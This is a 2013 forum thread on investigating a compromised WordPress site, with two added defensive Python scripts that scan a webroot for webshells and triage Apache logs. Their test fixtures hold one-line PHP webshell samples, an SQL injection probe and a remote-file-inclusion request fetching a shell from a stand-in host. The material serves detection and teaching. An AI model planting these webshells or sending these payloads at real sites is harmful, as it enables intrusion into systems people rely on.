February 4, 2013 at 5:45 am #8189
I'm seeing a lot of companies and individuals asking for forensics of their website after it gets hacked, and was wondering if some of y'all have experience in this and how you go about doing this type of work?
For example, a WordPress site that gets compromised and is serving up malware: how would you determine what happened, or where to look?
February 4, 2013 at 7:21 am #51765 dynamik (Participant)
Search for “incident” on this page; there are several publications: http://csrc.nist.gov/publications/PubsSPs.html
This is a great book as well: http://www.amazon.com/Real-Digital-Forensics-Computer-Security/dp/0321240693
February 4, 2013 at 3:27 pm #51766
Thanks for the links, ajohnson, but I'm talking about website forensics, not just general computer forensics. Like, which areas on a website do you look at for intrusion, and how do you mitigate them?
February 4, 2013 at 4:03 pm #51767 ziggy_567 (Participant)
Regardless of whether you're looking for compromise on a workstation, web server, or whatever, it all boils down to what logging you have in place. Without the logs, you can't do much investigating.
If adequate logging is in place, the incident response/investigation process does not deviate just because it’s a webserver.
February 4, 2013 at 4:49 pm #51768 caissyd (Participant)
I agree with ziggy_567.
"Like which areas on a website do you go to look for intrusion and how to mitigate them."
Mitigating vulnerabilities can be quite a challenge. I would start with the OWASP Top 10 vulnerabilities found in web applications: https://www.owasp.org/index.php/Top_10_2010-Main
February 4, 2013 at 6:40 pm #51769 dynamik (Participant)
Exactly what Ziggy said. The techniques are the same regardless of whether it's a web server, a database server, a domain controller, etc. You may be looking at a different log file and ancillary evidence, but it's the same general process. The resources I provided will answer your questions. Check out the "Hacker's Challenge" books as well; they walk you through real attacks and the ensuing IH/IR.
You also have to remember that a web app compromise can lead to a full-blown system compromise. You can’t just fix a hole in a web app and call it a day. If a backdoor is left unnoticed and active, you’ll still have a big problem on your hands. So again, regardless of whether the initial vector is a web app or a user downloading malware, you should still check when files were modified, running processes, user activity, network activity, etc.
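The "check when files were modified" step in the post above, as an added example that is not code from anyone in this thread: a small Python triage script that walks a WordPress-style webroot, lists PHP files changed after a baseline timestamp (say, the last known-good deploy), and separately flags file contents that look like a PHP backdoor even when the timestamp is old, because an attacker can reset mtimes with touch. The webroot, file names and indicator patterns are constructed for illustration and are not a complete signature set.

```python
"""Added example, not from the thread: post-compromise file-system triage of a
webroot.  Reports .php files modified after a baseline OR containing
backdoor-like constructs.  Sample files and patterns are constructed."""
import os
import re
import tempfile
import time

# Assumed indicators: constructs typical of PHP webshells.  Any hit in a file
# that is not part of the known code base deserves a manual look.
SUSPICIOUS_PATTERNS = [
    ("eval of decoded payload",
     re.compile(r"eval\s*\(\s*(?:gz(?:inflate|uncompress)|base64_decode|str_rot13)", re.I)),
    ("dynamic code execution from request",
     re.compile(r"\b(?:eval|assert|create_function)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I)),
    ("command execution from request",
     re.compile(r"\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I)),
    ("preg_replace /e modifier",
     re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/e['\"]", re.I)),
    ("file upload handler",
     re.compile(r"move_uploaded_file\s*\(", re.I)),
]


def scan_file(path):
    """Return the names of every indicator pattern found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(body)]


def triage_webroot(root, since):
    """Walk *root* and return (relative path, mtime, indicators) for each .php
    file modified after epoch timestamp *since* or containing an indicator.
    The content check is deliberately not gated on the timestamp."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            mtime = os.path.getmtime(full)
            hits = scan_file(full)
            if mtime > since or hits:
                findings.append((os.path.relpath(full, root), mtime, hits))
    findings.sort(key=lambda f: f[1], reverse=True)   # newest change first
    return findings


# Constructed sample webroot: two clean core/theme files, an uploaded webshell
# with a fresh mtime, and a backdoored "core" file whose mtime was reset.
SAMPLE_FILES = {
    "index.php": "<?php define('WP_USE_THEMES', true); require 'wp-blog-header.php';",
    "wp-content/themes/twentyten/footer.php": "<?php wp_footer(); ?></body></html>",
    "wp-content/uploads/2013/02/image.php": "<?php eval(base64_decode($_POST['c'])); ?>",
    "wp-includes/class-wp-cache.php": "<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>",
}
FRESH_FILE = "wp-content/uploads/2013/02/image.php"


def build_sample_webroot(root, baseline):
    """Write the constructed files; stamp all but FRESH_FILE as older than baseline."""
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
        stamp = baseline + 3600 if rel == FRESH_FILE else baseline - 86400
        os.utime(full, (stamp, stamp))


def run_demo():
    """Build the sample tree in a temp dir, triage it, and return the findings."""
    baseline = time.time() - 7 * 86400      # assumed last known-good deploy
    with tempfile.TemporaryDirectory() as root:
        build_sample_webroot(root, baseline)
        return triage_webroot(root, baseline)


if __name__ == "__main__":
    for rel, mtime, hits in run_demo():
        when = time.strftime("%Y-%m-%d %H:%M", time.localtime(mtime))
        print(when, rel, hits or "(recent change, no indicator)")
```

On a real box, run it against a copy of the webroot taken from the forensic image rather than the live filesystem, and treat a clean result as "nothing matched these patterns", not as "no backdoor": the content check is a starting point for manual review, and comparing against known-good package checksums is the stronger test where those are available.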
February 5, 2013 at 3:18 am #51770
The Hacker's Challenge books are just what I was looking for. Thanks, ajohnson.
February 6, 2013 at 4:01 am #51771 Ketchup (Participant)
This one is actually tough. In forensics, we have live system analysis and dead-box forensics. In order to do a complete investigation of a hacking/malware attack, you would want to capture RAM, other volatile information, and a forensic image of the box. This is really the best evidence for an analysis. Unfortunately, many WordPress, Joomla, and other CMS sites are run on shared hosting. You will not get access to the actual server (or the virtual machine) in most cases.
February 6, 2013 at 4:43 pm #51772 caissyd (Participant)
Nice point Ketchup!
February 12, 2013 at 1:33 pm #51773 jimbob (Participant)
Off the top of my head, here are a couple of things you need to look at for a forensic exam post-compromise on a web server. No doubt there's some repetition of what's been said, but here goes.
- Logs: check the web server's access logs for attack strings, access to admin pages, and anything else that looks anomalous, e.g. access to backdoor files.
- Server config: has any new configuration been added? Check for things like malicious Apache modules.
- Database: most web applications have some kind of backing store or database. Have new accounts been added? Is there anything else in there that could provide persistent access?
Your aim ought to be to determine how the compromise occurred, what was carried out after the attack, and to remedy the situation. Remember to use Google, since the attack is probably not unique to you. What web software are you using? Popular packages such as WordPress and Joomla are often the target of automated and effective attacks.
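The "Logs" item above, as an added example that is not code from anyone in this thread: a Python triage of an Apache combined-format access log that flags the three things the post names (attack strings, admin-page access, and hits on files that are not part of the known application) and then pivots from a suspected backdoor to every client that used it and when. The log lines are constructed, the known-good WordPress script list and the attack-string regexes are assumptions, and the whole thing is a first pass to narrow what you read by hand, not a detection product.

```python
"""Added example, not from the thread: access-log triage after a web
compromise.  Parses Apache combined-format lines, flags attack strings,
admin-page access and POSTs to unknown PHP scripts, and pivots on one file.
The log sample below is constructed; indicator lists are assumptions."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [ts] "METHOD path PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Assumed attack-string indicators, matched after URL-decoding the request.
ATTACK_STRINGS = [
    ("sql injection", re.compile(r"union\s+select|'\s*or\s+1\s*=\s*1|sleep\(\d", re.I)),
    ("path traversal", re.compile(r"\.\./")),
    ("xss probe", re.compile(r"<script|javascript:", re.I)),
    ("remote file inclusion", re.compile(r"[?&]\w+=https?://", re.I)),
]
ADMIN_PATHS = ("/wp-login.php", "/wp-admin/", "/xmlrpc.php")
# Assumed known-good PHP entry points for a WordPress install; a POST to any
# other .php file is a candidate backdoor (uploads/ should never run code).
KNOWN_PHP = re.compile(r"^/(index|wp-login|wp-cron|xmlrpc|wp-comments-post)\.php$|^/wp-admin/")


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage_log(lines):
    """One pass over the log; returns attack hits, admin access per IP and
    POST counts per unknown PHP script, plus how many lines did not parse."""
    report = {"attacks": [], "admin_access": Counter(),
              "unknown_php_posts": Counter(), "parse_failures": 0}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            report["parse_failures"] += 1
            continue
        path = unquote_plus(rec["path"])          # decode %27, %20 ... before matching
        for name, rx in ATTACK_STRINGS:
            if rx.search(path):
                report["attacks"].append((rec["ip"], name, rec["path"]))
        if path.startswith(ADMIN_PATHS):
            report["admin_access"][rec["ip"]] += 1
        script = path.split("?", 1)[0]
        if rec["method"] == "POST" and script.endswith(".php") and not KNOWN_PHP.match(script):
            report["unknown_php_posts"][script] += 1
    return report


def pivot_on_file(lines, script):
    """Every (ip, timestamp, status) that touched *script*: who used the
    backdoor, from where, and since when (first hit bounds the intrusion)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and unquote_plus(rec["path"]).split("?", 1)[0] == script:
            hits.append((rec["ip"], rec["ts"], rec["status"]))
    return hits


# Constructed sample: an SQLi probe, an RFI attempt against a hypothetical
# plugin, two clients POSTing to a PHP file under uploads/, ordinary admin
# logins, and one garbage line.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Feb/2013:02:11:07 +0000] "GET /?p=12%27%20union%20select%201,2,3-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Feb/2013:02:11:09 +0000] "GET /wp-content/plugins/gallery/load.php?src=http://evil.example/shell.txt HTTP/1.1" 200 210 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Feb/2013:02:12:30 +0000] "POST /wp-content/uploads/2013/02/image.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Feb/2013:09:40:01 +0000] "GET /wp-login.php HTTP/1.1" 200 3200 "-" "Mozilla/5.0"
198.51.100.9 - - [03/Feb/2013:09:40:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example/wp-login.php" "Mozilla/5.0"
192.0.2.77 - - [04/Feb/2013:17:05:44 +0000] "POST /wp-content/uploads/2013/02/image.php HTTP/1.1" 200 88 "-" "python-requests/1.1"
192.0.2.77 - - [04/Feb/2013:17:05:50 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "python-requests/1.1"
this line is not an access-log record
"""


def run_demo():
    """Triage the constructed log and pivot on its most-POSTed unknown script."""
    lines = SAMPLE_LOG.splitlines()
    report = triage_log(lines)
    suspect = report["unknown_php_posts"].most_common(1)[0][0]
    return report, suspect, pivot_on_file(lines, suspect)


if __name__ == "__main__":
    report, suspect, hits = run_demo()
    print("attack strings:", report["attacks"])
    print("admin access by ip:", dict(report["admin_access"]))
    print("suspected backdoor:", suspect)
    for ip, ts, status in hits:
        print("  used by", ip, "at", ts, "status", status)
```

The pivot is the part that answers "what was carried out after the attack": the earliest hit on the backdoor gives a lower bound on when the box was owned, and every source IP that used it is a lead to chase through the rest of the logs (and, as dynamik noted, through process and network evidence on the host, since a web shell is rarely the end of the story).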